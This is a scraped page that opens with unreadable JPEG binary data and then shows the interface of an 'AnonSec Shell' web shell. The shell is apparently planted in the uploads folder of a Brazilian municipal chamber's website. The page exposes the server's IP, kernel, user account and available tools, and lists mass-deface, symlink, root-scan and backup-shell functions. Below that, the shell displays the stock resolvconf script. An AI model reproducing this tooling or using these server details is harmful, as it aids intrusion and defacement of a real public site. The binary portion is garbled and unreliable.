JFIF  H H C nxxd C "     &    !1A2Q"aqBb    1   ? R{~ ,.Y| @sl_޸s[+6ϵG};?2Y`&9LP ?3rj  "@V]:3T -G*P ( *(@AEY]qqqALn +Wtu?)l QU T* Aj- x:˸T u53Vh @PS@ ,i,!"\hPw+E@ ηnu ڶh% (Lvũbb- ?M֍݌٥IHln㏷L(6 9L^"6P  d&1H&8@TUT CJ%eʹFTj4i5=0g J &Wc+3kU@PS@HH33M * "Uc(\`F+b{RxWGk ^#Uj*v' V ,FYKɠMckZٸ]ePP  d\A2glo=WL(6 ^;k"ucoH"b ,PDVlvL_/:̗rN\m dcw T-O$w+FZ5T *Y~l: 99U)8ZAt@GLX*@bijqW;MᎹ،O[5*5*@=qusݝ *EPx՝.~ YИ 3M3@E)GTg%Anp P MUҀhԳW c֦iZ ffR 7qMcyAZT c0bZU k+oG<] APQ T A={PDti@c>>KÚ"q L.1P k6QY7t.k7o  <P &yַܼJZy Wz{UrS @ ~P)Y:A"]Y&ScVO%17 6l4 i4YR5 ruk* ؼdZͨZZ cLakb3N6æ\1`XTloTuT AA 7Uq@2ŬzoʼnБRͪ&8}: e}0ZNΖJ*Ս9˪ޘtao]7$ 9EjS} qt" ( .=Y:V#'H: δ4#6yjѥBB ;WD-ElFf67*\AmAD Q __'2$ TX 9nu'm@iPDT qS`%u%3[nY,  :g = tiX H]ij"+6Z* .~|05s6 ,ǡ ogm+ KtE-BF  ES@(UJ xM~8%g/= Vw[Vh 3lJT  rK -kˎY ٰ  ,ukͱٵf sXDP  ]p]&MS95O+j &f6m463@ t8ЕX=6}HR 5ٶ06 /@嚵*6  " hP@eVDiYQT `7tLf4c?m//B4 laj  L} :E  b#PHQb, yN`rkAb^ |} s4XB4 * ,@[{Ru+%le2} `,kI$U` >OMuh  P % ʵ/ L\5aɕVN1R6 3}ZLj-Dl@ *( K\^i@F@551 k㫖h  Q沬#h XV +;]6z OsFpiX $OQ ) ųl4 YtK'(W AnonSec Shell
AnonSec Shell
Server IP : 20.75.53.88  /  Your IP : 216.73.217.165   [ Reverse IP ]
Web Server : Apache
System : Linux VMRALP-3 4.4.0-256-generic #290~14.04.1-Ubuntu SMP Thu Jun 20 09:24:50 UTC 2024 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29+esm15
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
Domains : 3 Domains
MySQL : ON  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/portais/camarabeberibe/uploads/publicacao/anon_sym/anon/sbin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/html/portais/camarabeberibe/uploads/publicacao/anon_sym/anon/sbin/resolvconf
#!/bin/sh
#
# This file is part of the resolvconf package.
#

set -e

echo_usage() { echo "Usage: resolvconf (-d IFACE|-a IFACE|-u|--enable-updates|--disable-updates|--updates-are-enabled|--create-runtime-directories|--wipe-runtime-directories)" ; }

PATH=/sbin:/bin
MYNAME="${0##*/}"
RUN_DIR=/run/resolvconf
IFACE_DIR="${RUN_DIR}/interface"
ENABLE_UPDATES_FLAGFILE="${RUN_DIR}/enable-updates"
POSTPONED_UPDATE_FLAGFILE="${RUN_DIR}/postponed-update"

report_err() { echo "${MYNAME}: Error: $*" >&2 ; }

# Check arguments
CMD="$1"
case "$CMD" in
  -a|-d)
	IFACE="$2"
	if [ ! "$IFACE" ] ; then
		report_err "No interface name specified"
		echo_usage >&2
		exit 1
	fi
	report_iface_err() {
		report_err "$* not allowed in interface record name"
	}
	case "$IFACE" in
	  */*) report_iface_err "Slash" ; exit 1 ;;
	  *" "*) report_iface_err "Space" ; exit 1 ;;
	  .*) report_iface_err "Initial dot" ; exit 1 ;;
	  -*) report_iface_err "Initial hyphen" ; exit 1 ;;
	  ~*) report_iface_err "Initial tilde" ; exit 1 ;;
	esac
	;;
  -u|--enable-updates|--disable-updates|--updates-are-enabled|--create-runtime-directories|--wipe-runtime-directories)
  	if [ "$2" ] ; then
		report_err "The $CMD option does not take an argument"
		echo_usage >&2
		exit 1
	fi
	;;
  *)
	report_err "Command not recognized"
	echo_usage >&2
	exit 99
	;;
esac

# Handle creation and wiping of run-time directories
case "$CMD" in
  --create-runtime-directories)
	umask 022
	if [ ! -d "$RUN_DIR" ] ; then
		# Create directory at the target
		mkdir "$RUN_CANONICALDIR" || { report_err "Error creating directory $RUN_CANONICALDIR" ; exit 1 ; }
	fi
	# The resolvconf run directory now exists.
	if [ ! -d "${RUN_DIR}/interface" ] ; then
		mkdir "${RUN_DIR}/interface" || { report_err "Error creating directory ${RUN_DIR}/interface" ; exit 1 ; }
	fi
	# The interface directory now exists.  We are done.
	exit 0
	;;
  --wipe-runtime-directories)
	# Delete files in the resolvconf run directory (target) but not the directory itself
	[ -d "$RUN_DIR" ] || exit 0
	rm -f "$RUN_DIR"/resolv.conf
	rm -f "$ENABLE_UPDATES_FLAGFILE"
	rm -f "$POSTPONED_UPDATE_FLAGFILE"
	rm -rf "$IFACE_DIR"
	exit 0
	;;
esac

[ -d "$IFACE_DIR" ] || { report_err "$IFACE_DIR either does not exist or is not a directory" ; exit 1 ; }
cd "$IFACE_DIR"

update_and_exit()
{
	rm -f "$POSTPONED_UPDATE_FLAGFILE"
	exec run-parts ${1:+--arg="$1"} ${2:+--arg="$2"} /etc/resolvconf/update.d
}

# Handle commands that don't require normalized_stdin()

case "$CMD" in
  -d)
	if [ ! -e "$IFACE" ] ; then
		exit 0
	fi
	if [ ! -s "$IFACE" ] ; then
		rm -f "$IFACE"
		exit 0
	fi
	rm -f "$IFACE"
	if [ -e "$ENABLE_UPDATES_FLAGFILE" ] ; then
		update_and_exit -d "$IFACE"
	else
		: >| "$POSTPONED_UPDATE_FLAGFILE"
		exit 0
	fi
	;;
  -u)
	if [ -e "$ENABLE_UPDATES_FLAGFILE" ] ; then
		update_and_exit -u
	else
		: >| "$POSTPONED_UPDATE_FLAGFILE"
		exit 0
	fi
	;;
  --enable-updates)
	: >| "$ENABLE_UPDATES_FLAGFILE" || exit 1
	if [ -e "$POSTPONED_UPDATE_FLAGFILE" ] ; then
		(update_and_exit -u) || :
	fi
	exit 0
	;;
  --disable-updates)
	rm -f "$POSTPONED_UPDATE_FLAGFILE" || :
	rm -f "$ENABLE_UPDATES_FLAGFILE" || exit 1
	exit 0
	;;
  --updates-are-enabled)
	if [ -e "$ENABLE_UPDATES_FLAGFILE" ] ; then
		exit 0
	else
		exit 1
	fi
	;;
esac

#	
# The following function must EXACTLY the same in the resolvconf
# and test-normalization scripts. And the test must pass!
#
### BEGIN FUNCTION TO COPY TO THE test-normalization SCRIPT ###
#
# Echo stdin with:
#	comments removed;
#	initial and terminal whitespace removed;
#	whitespace strings replaced by single blanks;
#	leading zeroes removed from nameserver address fields;
#	first set of zero fields in an IPv6 address collapsed to '::';
#	empty lines removed.
normalized_stdin() {
	sed                                                                        \
		-e 's/#.*$//'                                                      \
		-e 's/[[:blank:]]\+$//'                                            \
		-e 's/^[[:blank:]]\+//'                                            \
		-e 's/[[:blank:]]\+/ /g'                                           \
		-e '/^nameserver/!b ENDOFCYCLE'                                    \
		-e 's/$/ /'                                                        \
		-e 's/\([:. ]\)0\+/\10/g'                                          \
		-e 's/\([:. ]\)0\([123456789abcdefABCDEF][[:xdigit:]]*\)/\1\2/g'   \
		-e '/::/b ENDOFCYCLE; s/ \(0[: ]\)\+/ ::/'                         \
		-e '/::/b ENDOFCYCLE; s/:\(0[: ]\)\+/::/'                          \
		-e ': ENDOFCYCLE'                                                  \
		- |                                                                \
	sed                                                                        \
		-e 's/[[:blank:]]\+$//'                                            \
		-e '/^$/d'
}
### END FUNCTION TO COPY TO THE test-normalization SCRIPT ###

case "$CMD" in
  -a)
	OLD_CONTENT=""
	[ -f "$IFACE" ] && OLD_CONTENT="$(cat "$IFACE")"
	NEW_CONTENT="$(normalized_stdin)"
	# Proceed only if content has changed. The test here can't
	# eliminate 100% of redundant invocations of update scripts
	# because we don't do any locking; however it certainly does
	# eliminate most of them.
	if [ "$NEW_CONTENT" = "$OLD_CONTENT" ] ; then 
		exit 0
	fi
	IFACE_TMPFILE="${IFACE}_new.$$"
	cleanup() { rm -f "$IFACE_TMPFILE" ; }
	trap cleanup EXIT
	echo "$NEW_CONTENT" > "$IFACE_TMPFILE"
	mv -f "$IFACE_TMPFILE" "$IFACE"

	if [ -e "$ENABLE_UPDATES_FLAGFILE" ] ; then
		update_and_exit -a "$IFACE"
	else
		: >| "$POSTPONED_UPDATE_FLAGFILE"
		exit 0
	fi
	;;
esac

# Don't reach here
exit 99

Anon7 - 2022
AnonSec Team